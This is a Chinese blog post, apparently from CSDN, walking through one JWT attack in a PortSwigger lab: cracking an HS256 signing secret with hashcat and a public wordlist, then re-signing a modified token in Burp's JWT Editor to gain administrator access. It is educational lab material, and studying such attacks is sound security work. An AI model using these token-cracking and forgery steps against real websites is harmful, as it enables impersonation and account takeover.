6种常见的JWT Attack,绕过网站身份验证 - 3.爆力破解对称式加密签名

最新推荐文章于 2024-05-21 22:53:26 发布
最新推荐文章于 2024-05-21 22:53:26 发布
阅读量666 收藏 5
点赞数 19
文章标签: 网络 安全 web安全 安全威胁分析 系统安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/raymond0820/article/details/137455612
版权

简介

JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。

JWT常见攻击手法有以下几种:

  1. 签名未验证
  2. JWT无签名
  3. 爆力破解对称式加密签名
  4. 用kid绕过对称式加密签名
  5. 用JWK绕过非对称式加密签名
  6. 用JKU绕过非对称式加密签名


关于JWT的介绍可参考json web token介绍

3.爆力破解对称式加密签名

某些签名算法,像是HS256(HMAC+SHA-256),可以使用任意字符串做为密钥,因此可以透过爆力密码破解得到密钥,并使用密钥重签名

举例如下,以下是访问网站的JWT token,需要administrator身份才能访问,而且使用HS256签名

################ request ################
GET /admin HTTP/1.1
Host: 0aff00980379e949c0ec224a00f90071.web-security-academy.net
Cookie: session=eyJraWQiOiJkYjFiZWEzOS05MjQwLTRjYjItODQ0MS04NjZjMjIxZDFmODUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NzYwNjgwNH0.faMYDNGlalEN2C5YD2NGaRejmOAIXj1GQ2priBVj3yE
...omit...

################ response ################ 
...omit...Admin interface only available if logged in as an administrator...omit...

所以直接改成adminstrator没有用,还必须要得到签名用的secret key,在重新根据修改内容重新签名才行,步骤如下

step1,找出secret key

先准备一组密码档jwt.secrets.list,内容可以参考https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

然后透过hastcat尝试爆力破解目前token

hashcat -a 0 -m 16500 eyJraWQiOiJkYjFiZWEzOS05MjQwLTRjYjItODQ0MS04NjZjMjIxZDFmODUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NzYwNjgwNH0.faMYDNGlalEN2C5YD2NGaRejmOAIXj1GQ2priBVj3yE jwt.secrets.list

破解后会发现secret key为secret1

step2,产生JWT key

JWT editor keys中选择new symmetric key, 按下generate会产生以下内容

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>{
    "kty": "oct",
    "kid": "6e45657d-202e-4e74-a50d-0c8f785dc1cf",
    "k": "qzlgHvHrjWoqNS_9Jd_1EQ"
}</code></span></span>

将刚刚的secret key使用base64编码得到c2VjcmV0MQ==,然后贴上如下

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>{
    "kty": "oct",
    "kid": "6e45657d-202e-4e74-a50d-0c8f785dc1cf",
    "k": "c2VjcmV0MQ=="
}</code></span></span>

step3. 对修改的内容重签名

JWT editor将原本的token内容改为administrator如下

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>{
    "iss": "portswigger",
    "sub": "administrator", 
    "exp": 1657606804
}</code></span></span>

接着在JWT editor中点选sign,然后选择以下配置

  • signing key: you generated in the JWT editor keys
  • signing algorithm: HS256
  • header options: don't modify header

就会根据token修改的内容,产生相对应的签名,使用这全新token就可以用administrator身份访问admin功能

 其他方法可参考

6种常见的JWT attack方法

Web Security Academy

 

牛的大腦-網站安全
关注
  • 19
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shiro-attack-4.7.0-SNAPSHOT-all.zip
10-24
shiro_attack-4.7.0-SNAPSHOT-all.zip 序列化验证工具
6常见JWT Attack,绕过网站身份验证 - 1.签名未验证
raymond0820的博客
04-04 309
JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。
6常见JWT Attack,绕过网站身份验证 - 2.JWT签名
raymond0820的博客
04-06 148
JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。
Spring Security 5.0.x 参考手册 【翻译自官方GIT-2018.06.12】
热门推荐
hchhan的博客
06-12 2万+
源码请移步至:https://github.com/aquariuspj/spring-security/tree/translator/docs/manual/src/docs/asciidoc版本号:5.0.x 参考手册 【翻译自官方GIT - 2018.06.12】Spring Security参考手册Spring Security是一个强大且高度可定制的身份验证和访问控制框架。 这是保护基...
Diffie-Hellman密钥交换协议(Diffie-Hellman Key Exchange,简称DHKE)
西京刀客
05-28 1763
Deffie-Hellman(简称 DH) 密钥交换是最早的密钥交换算法之一,它使得通信的双方能在非安全的信道中安全的交换密钥,用于加密后续的通信消息。 Whitfield Diffie 和 Martin Hellman 于 **1976** 提出该算法,之后被应用于安全领域,比如 Https 协议的 TSL(Transport Layer Security)以 DH 算法作为密钥交换算法。
shiro_attack-2.2.jar
12-17
shiro_attack-2.2.jar
AS-23-Yuanzhen-A-new-attack-interface-in-Java.pdf
11-17
AS-23-Yuanzhen-A-new-attack-interface-in-Java
watermark-MATLAB.rar_WaterMark.rar_attack_matlab watermark_提取水印_
07-14
数字水印技术是当前比较流行的防盗版技术,本程序包括水印的嵌入,一般攻击,水印提取,水印的检测
Space Attack游戏代码-haiyong.site.zip
05-16
敌人被消灭后,会随机掉落道具,玩家可以通过收集道具来增加生命值或者增加攻击力。 游戏有多个关卡,每个关卡的敌人数量和难度都会逐渐增加。 游戏有计分系统,玩家的得分会根据消灭的敌人数量和收集的道具数量...
使用MPLS解决BGP的路由黑洞(详解)
qq_64302290的博客
05-18 233
我们知道在MPLS中数据的转发不再依靠路由表而是靠标签(注意:标签是在路由的基础上形成的)。所以在BGP中,我们依靠的就是这个特性来解决BGP的路由黑洞。BGP路由黑洞的解释:BGP的路由黑洞其实就是路由层面可达,数据层面不可达。(你可以收到对方的路由,但是不能和对方通讯。
计算机网络
zengkui198513的博客
05-15 310
上面的每一个问题是每一层都必须面对的也都必须要解决的。每一层而且必须要覆盖上面的信息!
云服务器遇到攻击怎么办,有哪些安全措施
dexunyun的博客
05-18 552
DDoS攻击对云服务器安全构成了严重威胁,但通过采取合适的防护策略,我们可以有效地降低攻击的影响。选择可靠的云服务提供商、部署DDoS防护服务是保护云服务器免受DDoS攻击的有效措施。德迅云安全提供了多防护解决方案,可以帮助企业有效防止DDoS攻击,保护云服务器的安全,保障业务稳定。
MQTT 异常断开(一)
m0_50668851的博客
05-21 167
MQTT异分析问题总结 前提:MQTT是基于TCP层再次封装,MQTT是不关心TCP层的实现与传输,但是如果TCP链路出现异常(丢失TCP ACK网络延时TCP ACK等)一定会导致MQTT断开连接。 MQTT代理服务器存在如下问题: a.代理服务器,对于连接时没有及时处理收到模块关于TCP层的 TCP ACK(Seq确认包),出现重传MQTT Connect Ack。模块内部MQTT的处理逻辑,NQTT收到Connect Ack之后,模块已经准备就绪,回码OK, 但是客户......
netstat协议
lovemelovefish的博客
05-15 389
本机各端口的网络连接情况。
文件操作IO&网络编程&网络原理
tulingtuling的博客
05-13 1613
文件操作IO,网络编程,网络原理
0基础如何进入IT行业
2302_76516899的博客
05-19 602
IT(Information Technology,信息技术)行业涵盖了与计算机技术相关的所有领域。主要包括软件开发、硬件维护、网络架构、数据库管理、网络安全、云计算和人工智能等。了解这些领域的基本概念和发展趋势是进入IT行业的第一步。
OSPF多区域组网实验(思科)
最新发布
qq_65150735的博客
05-21 195
OSPF(Open Shortest Path First,开放最短路径优先)是一广泛使用的动态路由协议,属于链路状态路由协议。它主要用于在单一自治系统(AS)内部决策路由,并通过传递链路状态信息和使用算法计算最短路径,为数据包选择最佳的路径,实现快速且有效的数据传输。
def cooldowns(self): current_time = pygame.time.get_ticks() if not self.can_attack: if current_time - self.attack_time >= self.attack_cooldown: self.can_attack = True if not self.vulnerable: if current_time - self.hit_time >= self.invincibility_duration: self.vulnerable = True对此代码进行注解
06-03
好的,以下是对这段代码的注释: ```python def cooldowns(self): # 获取当前时间 current_time = pygame.time.get_ticks() # 如果角色不能攻击 if not self.can_attack: # 如果距离上次攻击已经过了攻击冷却时间 if current_time - self.attack_time >= self.attack_cooldown: # 将 can_attack 标记为 True,表示可以再次攻击 self.can_attack = True # 如果角色不处于无敌状态 if not self.vulnerable: # 如果距离上次受到攻击已经过了无敌时间 if current_time - self.hit_time >= self.invincibility_duration: # 将 vulnerable 标记为 True,表示可以再次受到攻击 self.vulnerable = True ``` 这段代码主要是控制角色攻击和无敌状态的冷却机制。其中 `pygame.time.get_ticks()` 函数用于获取当前时间,以毫秒为单位。代码中的 `can_attack` 和 `vulnerable` 变量分别表示是否能够攻击和是否处于无敌状态。 在代码中,首先判断角色是否能够攻击。如果不能攻击,则判断距离上次攻击是否已经过了攻击冷却时间。如果已经过了攻击冷却时间,就将 `can_attack` 设置为 True,表示可以再次攻击。 接着判断角色是否处于无敌状态。如果不是无敌状态,则判断距离上次受到攻击是否已经过了无敌时间。如果已经过了无敌时间,就将 `vulnerable` 设置为 True,表示可以再次受到攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值